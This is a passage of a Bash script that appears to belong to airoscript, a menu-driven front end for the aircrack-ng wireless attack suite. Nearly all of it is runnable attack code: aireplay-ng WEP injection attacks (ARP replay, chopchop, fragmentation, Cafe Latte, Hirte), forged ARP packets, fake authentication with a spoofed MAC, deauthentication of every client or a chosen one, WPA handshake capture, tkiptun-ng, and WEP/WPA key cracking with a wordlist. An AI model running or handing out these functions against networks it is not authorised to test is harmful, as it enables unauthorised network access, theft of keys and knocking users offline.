airoscfunc.sh

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough dat

	    1 ) fakeautoattack ; break ;;
	    2 ) fakeinteractiveattack;$CLEAR ; break ;;
	    3 ) fragnoclient ;$CLEAR; break ;;
	    4 ) chopchopattack ;$CLEAR; break ;;
	    5 ) cafelatteattack ;$CLEAR; break ;;
	    6 ) hirteattack ;$CLEAR; break ;;
	    7 ) attackclient ;$CLEAR; break ;;
	    8 ) interactiveattack ;$CLEAR; break ;;
	    9 ) fragmentationattack ;$CLEAR; break ;;
	    10 ) fragmentationattackclient;$CLEAR ; break ;;   
	    11 ) chopchopattackclient;$CLEAR ; break ;;
	    12 ) pskarp ;$CLEAR; break ;;
	    13 ) $CLEAR;break ;;
	    * ) echo -e "`gettext \"Unknown response. Try again\"`" ;;
	  esac
	done 
	}
		# Subproducts of attackwep function:

		#Option 1 (fake auth auto)
		function fakeautoattack {
			if [ "$INTERACTIVE" ] # More interactive airoscript.
			then
				
				read -p "`gettext \"Enter destination mac: (FF:FF:FF:FF:FF:FF)\"`" INJMAC
					if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
				read -p "`gettext \"Enable From or To destination bit (f/t):  \"`" FT 
					if [ "$FT" = "" ]; then FT="f"; fi
			else
				INJMAC="FF:FF:FF:FF:FF:FF"
				FT="f"
			fi

			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext \"Injection: Host: $Host_MAC\"`" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY $IWIFI --arpreplay -b $Host_MAC -d $INJMAC -$FT 1 -m 68 -n 86 -h $FAKE_MAC -x $INJECTRATE & choosefake

		}
		#Option 2 (fake auth interactive)
		function fakeinteractiveattack {
			if [ "$INTERACTIVE" ] # More interactive airoscript.
			then
				read -p "`gettext \"Enter destination mac: (FF:FF:FF:FF:FF:FF)\"`" INJMAC
					if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
				read -p "`gettext \"Set framecontrol word (hex): (0841) \"`" FT 
					if [ "$FT" = "" ]; then FT="0841"; fi
			else
				INJMAC="FF:FF:FF:FF:FF:FF"
				FT="0841"
			fi
			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG  "`gettext 'Interactive Packet Sel on Host: $Host_SSID'`" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY $IWIFI --interactive -p $FT -c $INJMAC -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE & choosefake 
		}

		#Option 3 (fragmentation attack)
		function fragnoclient {
			rm -rf fragment-*.xor
			rm -rf $DUMP_PATH/frag_*.cap
			rm -rf $DUMP_PATH/$Host_MAC*
			killall -9 airodump-ng aireplay-ng # FIXME Is this a good idea? I think we should save pids of what we launched, and then kill them.
		$CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $TITLEFLAG  "`gettext  \"Fragmentation attack on $Host_SSID\"` " $EXECFLAG $AIREPLAY -5 -b $Host_MAC -h $FAKE_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $IWIFI & capture & choosefake &  injectmenu
			}

		#Option 4 (chopchopattack)
		function chopchopattack {
			$CLEAR
			rm -rf $DUMP_PATH/$Host_MAC*
			rm -rf replay_dec-*.xor
			capture &  fakeauth3 & $CDCMD  $TERMINAL $HOLD $TITLEFLAG  "`gettext 'ChopChoping:'` $Host_SSID " $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $EXECFLAG $AIREPLAY --chopchop -b $Host_MAC -h $FAKE_MAC $IWIFI & injectmenu
		}
		#Option 5 (caffe late attack)
		function cafelatteattack {
			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG  "`gettext 'Cafe Latte Attack on:'` $Host_SSID " $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY -6 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $IWIFI & fakeauth3 & menufonction
			}

		#Option 6 (hirte attack)
		function hirteattack {
			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Hirte Attack on:'` $Host_SSID" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY -7 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $IWIFI & fakeauth3 & menufonction
		}

		#Option 7 (Auto arp replay)
		function attackclient {
			if [ "$INTERACTIVE" ] # More interactive airoscript.
			then
				read -p "`gettext \"Enter destination mac: (FF:FF:FF:FF:FF:FF)\"`" INJMAC
					if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
				read -p "`gettext 'Enable From or To destination bit (f/t):  '`" FT 
					if [ "$FT" = "" ]; then FT="f"; fi
			else
				INJMAC="FF:FF:FF:FF:FF:FF"
				FT="f"
			fi
			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Injection:'` `gettext 'Host'` : $Host_MAC `gettext 'Client'` : $Client_MAC" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY $IWIFI --arpreplay -b $Host_MAC -d $INJMAC -$FT 1 -m 68 -n 86  -h $Client_MAC -x $INJECTRATE & menufonction
		}

		#Option 8 (interactive arp replay) 
		function interactiveattack {
			if [ "$INTERACTIVE" ] # More interactive airoscript.
			then
				read -p "`gettext 'Enter destination mac: (FF:FF:FF:FF:FF:FF)'`" INJMAC
					if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
				read -p "`gettext 'Set framecontrol word (hex): (0841) '`" FT 
					if [ "$FT" = "" ]; then FT="0841"; fi
			else
				INJMAC="FF:FF:FF:FF:FF:FF"
				FT="0841"
			fi
			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Interactive Packet Sel on:'` $Host_SSID" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY $IWIFI --interactive -p $FT -c $INJMAC -b $Host_MAC $Client_MAC -x $INJECTRATE & menufonction
		}

		#Option 9 (fragmentation attack)
		function fragmentationattack {
			rm -rf fragment-*.xor
			rm -rf $DUMP_PATH/frag_*.cap
			rm -rf $DUMP_PATH/$Host_MAC*
			killall -9 airodump-ng aireplay-ng
			$CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $TITLEFLAG "`gettext \"Fragmentation attack on $Host_SSID\"`" $EXECFLAG $AIREPLAY -5 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $IWIFI & capture &  injectmenu
		}

		#Option 10 (fragmentation attack with client)
		function fragmentationattackclient {
			rm -rf fragment-*.xor
			rm -rf $DUMP_PATH/frag_*.cap
			rm -rf $DUMP_PATH/$Host_MAC*
			killall -9 airodump-ng aireplay-ng
			$CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $TITLEFLAG "`gettext \"Fragmentation attack on $Host_SSID\"`" $EXECFLAG $AIREPLAY -7 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $IWIFI & capture &  injectmenu
		}
		#Option 11
		function chopchopattackclient {
			$CLEAR
			rm -rf $DUMP_PATH/$Host_MAC*
			rm -rf replay_dec-*.xor
			capture & $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'ChopChoping: $Host_SSID'`" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $EXECFLAG $AIREPLAY --chopchop -h $Client_MAC $IWIFI & injectmenu
		}
		#Option 12 (pskarp)
		function pskarp {
			rm -rf $DUMP_PATH/arp_*.cap
			$ARPFORGE -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y $DUMP_PATH/dump*.xor -w $DUMP_PATH/arp_$Host_MAC.cap 	
			capture & $CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext \"Sending forged ARP to: $Host_SSID\"`" $EXECFLAG $AIREPLAY --interactive -r $DUMP_PATH/arp_$Host_MAC.cap -h $Client_MAC -x $INJECTRATE $IWIFI & menufonction
		}
		# End of subproducts.

	# If wpa
	function wpahandshake {
		$CLEAR
		rm -rf $DUMP_PATH/$Host_MAC*
		$CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Capturing data on channel:'` $Host_CHAN" $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$DUMPING_COLOR" $EXECFLAG $AIRODUMP -w $DUMP_PATH/$Host_MAC --channel $Host_CHAN -a $WIFI & menufonction
	}

	function attackopn { # If no encryption detected
	  if [ "$Host_SSID" = "" ] 
	  then
		 $CLEAR
	 	 echo  "`gettext 'ERROR: You have to select a target'`"
	  else
		$CLEAR
			echo `gettext "ERROR: Network not encrypted or no network selected "`
			fi
	}


	function attackwpa {
while true; do
$CLEAR
echo "`gettext '
____________Select WPA Attack________
#                                   #
# 1) Standard attack                #
# 2) Standard attack with QoS (WMM) #
#___________________________________#
Option: '`"
read n
	case $n in 
		1) wpahandshake; $CLEAR; break;;
		2) tkiptunstdqos; $CLEAR; break;;
	esac
done
	}

	# 1 just capture 

	function wpahandshake {
		$CLEAR
		rm -rf $DUMP_PATH/$Host_MAC*
		$CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Capturing data on channel:'` $Host_CHAN" $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$DUMPING_COLOR" $EXECFLAG $AIRODUMP -w $DUMP_PATH/$Host_MAC --channel $Host_CHAN -a $WIFI & menufonction
	}

	# 2 Use tkiptun-ng
	function tkiptunstdqos {
		$CLEAR
		rm -rf $DUMP_PATH/$Host_MAC*
		ifconfig $WIFICARD channel $Host_CHAN # Hope this is ok for all cards
		$CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Executing tkiptun-ng for ap'` $Host_MAC" $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$DUMPING_COLOR" $EXECFLAG $TKIPTUN -h $FAKE_MAC -a $Host_MAC -m $TKIPTUN_MIN_PL -n $TKIPTUN_MAX_PL  $WIFI & menufonction
	}
##################################################################################
##################################################################################
######################### This is for CRACK (4)  option: ######################################
##################################################################################
##################################################################################
function witchcrack {
	if [ "$EXTERNAL" = "1" ]
		then
			while true; do
				echo -e -n "`gettext '
	||
	||
	\/
	_____________________________________
	##      WEP/WPA CRACKING OPTIONS   ##
	##                                 ##
	##   1) Use Wlandecrypter          ##
	##   2) Use Jazzteldecrypter	   ##	
	##   3) Use aircrack-ng            ##
	##   4) Return to main menu        ##
	##_________________________________##
	Option:'`"

					read yn
				
				case $yn in
					1 ) wld ; break ;;
					2 ) jtd ; break ;;
					3 ) selectcracking ; break ;;
					4 ) $CLEAR; break;;
					* ) echo "Unknown response. Try again" ;;
				esac
			done 
		else
			echo "No external functions loaded, defaulting to wep/wpa cracking"
			selectcracking
		fi
}

function selectcracking {
	if [ "$Host_ENC" = "OPN" ] || [ "$Host_ENC" = "" ] || [ "$Host_ENC" = " OPN " ]
	then
		$CLEAR
		echo `gettext "ERROR: Network not encrypted or no network selected "`

	else
		if [ "$Host_ENC" = " WEP " ] || [ "$Host_ENC" = "WEP" ]
		then
			crack
		else
			wpacrack
		fi
	fi
}

#This is crack function, for WEP encryption:
	function crack {
		while true; do
		echo -e -n "`gettext '
		_____________________________________
		##      WEP CRACKING OPTIONS       ##
		##                                 ##
		##   1) aircrack-ng PTW attack     ##
		##   2) aircrack-ng standard       ##
		##   3) aircrack-ng user options   ##
		##                                 ##
		##_________________________________##
		Option: '`"
		read yn
		case $yn in
		1 ) crackptw ; $CLEAR; break ;;
		2 ) crackstd ; $CLEAR; break ;;
		3 ) crackman ; $CLEAR; break ;;
		* ) echo "`gettext 'Unknown response. Try again'`" ;;
		esac
		done 
	}
	
		# Those are subproducts of crack for wep.
		function crackptw   {
			$TERMINAL $HOLDFLAG $TITLEFLAG "Aircracking-PTW: $Host_SSID" $TOPRIGHTBIG $EXECFLAG $AIRCRACK -z -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap & menufonction
		}

		function crackstd   {
			$TERMINAL $HOLDFLAG $TITLEFLAG "Aircracking: $Host_SSID" $TOPRIGHTBIG $EXECFLAG $AIRCRACK -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap & menufonction
		}
	
		function crackman {
			echo -n "type fudge factor"
			read FUDGE_FACTOR
			echo You typed: $FUDGE_FACTOR
			set -- ${FUDGE_FACTOR}
			echo -e -n "`gettext \"type encryption size 64,128 etc...\"`"
			read ENC_SIZE
			echo You typed: $ENC_SIZE
			set -- ${ENC_SIZE}
			$TERMINAL $HOLDFLAG $TITLEFLAG "`gettext 'Manual cracking:'` $Host_SSID" $TOPRIGHTBIG $EXECFLAG $AIRCRACK -a 1 -b $Host_MAC -f $FUDGE_FACTOR -n $ENC_SIZE -0 -s $DUMP_PATH/$Host_MAC-01.cap & menufonction
		}

	# This is for wpa cracking
	function wpacrack {
		$TERMINAL $HOLDFLAG $TOPRIGHT $TITLEFLAG "Aircracking: $Host_SSID" $EXECFLAG $AIRCRACKOLD $FORCEWPAKOREK -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST & menufonction # There was a -0 -s before $DPATH/$HmaC but -0 is not documented, anyway, it works, so I replaced it (-s is for showing ascii key)
	}
	
########################################################################################## 
########################################################################################## 
######################### This is for Fake auth  (5)  option: ############################ 
########################################################################################## 
##########################################################################################
# This is the function to select Target from a list					 #
# MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room # 
# And HIRTE for making all those great patch and fixing the SSID issue			 #
##########################################################################################
function choosefake {
if [ "$Host_SSID" = "" ]
then 
	$CLEAR
	echo "ERROR: You have to select a target first"
else
	while true; do
		echo -n -e "`gettext '
	||
	||
	\/	
______________Fake auth______________
##   Select fakeauth method        ##
##                                 ##
##   1) Conservative               ##
##   2) Standard                   ##
##   3) Progressive                ##
##_________________________________##
Option: '`"
		read yn
		case $yn in
			1 ) fakeauth1 ;$CLEAR; break ;;
			2 ) fakeauth2 ;$CLEAR; break ;;
			3 ) fakeauth3 ;$CLEAR; break ;;
			* ) echo "Unknown response. Try again" ;;
		esac
	done 
fi
}


# Those are subproducts of choosefake
	function fakeauth1 {
		$TERMINAL $HOLD $TITLEFLAG "`gettext 'Associating with:'` $Host_SSID " $BOTTOMRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$ASSOCIATION_COLOR" $EXECFLAG $AIREPLAY --fakeauth 6000 -o 1 -q 10 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $IWIFI & menufonction
	}
	function fakeauth2 {
		$TERMINAL $HOLD $TITLEFLAG "`gettext 'Associating with:'`$Host_SSID" $BOTTOMRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$ASSOCIATION_COLOR" $EXECFLAG $AIREPLAY --fakeauth 0 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $IWIFI & menufonction
	}
	function fakeauth3 {
		$TERMINAL $HOLD $TITLEFLAG "`gettext 'Associating with:'`$Host_SSID" $BOTTOMRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$ASSOCIATION_COLOR" $EXECFLAG $AIREPLAY --fakeauth 5 -o 10 -q 1 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $IWIFI & menufonction
	}
	
##################################################################################
##################################################################################
######################### This is for deauth  (6)  option:       ###################################
##################################################################################
##################################################################################
function choosedeauth {
if [ "$Host_SSID" = "" ]
then
	$CLEAR
	echo "ERROR: You have to select a target first"
else
	while true; do
	echo -n -e "`gettext '
	||
	||
	\/	
_____________________________________
##   Who do you want to deauth ?   ##
##                                 ##
##   1) Everybody                  ##
##   2) Myself (the Fake MAC)      ##
##   3) Selected client            ##
##_________________________________##
Option: '`"
	read yn
	case $yn in
	1 ) deauthall ; $CLEAR ; break ;;
	2 ) deauthfake ; $CLEAR ; break ;;
	3 ) deauthclient ; $CLEAR; break ;; 
	* ) echo -e "`gettext \"Unknown response. Try again\"`" ;;

	esac
	done 
fi
}

	# Subproducts of choosedeauth
		function deauthall {
			$TERMINAL $HOLD $TOPRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext 'Kicking everybody from:'` $Host_SSID" $EXECFLAG $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI
		}
		
		function deauthclient {
		if [ "$Client_MAC" = "" ]
		then	
			$CLEAR
			echo "ERROR: You have to select a client first"
		else
			$TERMINAL $HOLD $TOPRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext 'Kicking $Client_MAC from:'` $Host_SSID" $EXECFLAG $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $IWIFI
		fi
		}
		
		function deauthfake {
			$TERMINAL $HOLD $TOPRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext 'Kicking'` $FAKE_MAC ( $Host_SSID )" $EXECFLAG $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $IWIFI
		}


##################################################################################
##################################################################################
######################### This is for others  (7)  option:       #################
##################################################################################
##################################################################################
function optionmenu {
	while true; do
echo -e -n "`gettext '
	||
	||
	\/	
_____________________________________
##  Select task to perform         ##
##                                 ##
##   1) Test injection             ##
##   2) Select another interface   ##
##   3) Reset selected interface   ##
##   4) Change MAC of interface    ##
##   5) Mdk3                       ##
##   6) Wesside-ng                 ##
##   7) Enable monitor mode        ##
##   8) Checks with airmon-ng      ##
##   9) Change DUMP_PATH	   ##
##   10) Return to main menu       ##
##_________________________________##
Option: '`"
	read yn
	echo ""
	case $yn in
	1 ) inject_test ; $CLEAR; break ;;
	2 ) setinterface2 ; $ClEAR; break ;;
	3 ) cleanup ;$CLEAR; break ;; 
	4 ) wichchangemac ; $CLEAR; break ;;
	5 ) choosemdk ;$CLEAR; break;;
	6 ) choosewesside ;$CLEAR; break ;;
	7 ) monitor_interface;$CLEAR ; break ;;
	8 ) airmoncheck ;$CLEAR; break ;;
	9 ) changedumppath;$CLEAR; break;;
	10 ) $CLEAR;break ;;
	* ) echo -e "`gettext \"Unknown response. Try again\"`" ;;
	
	esac
	done 
}

# I suppose all these are part of this option:
	# 1.
	function inject_test {
		$TERMINAL $HOLD $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY $IWIFI --test & menufonction
	}
	# 2.
	function setinterface2 {

		echo "`gettext 'Select your interface:'`"
		select WIFI in $INTERFACES; do
			break;
		done

		export WIFICARD=$WIFI
		echo -n `gettext 'Should I put it in monitor mode?'` " (Y/n) "
		read answer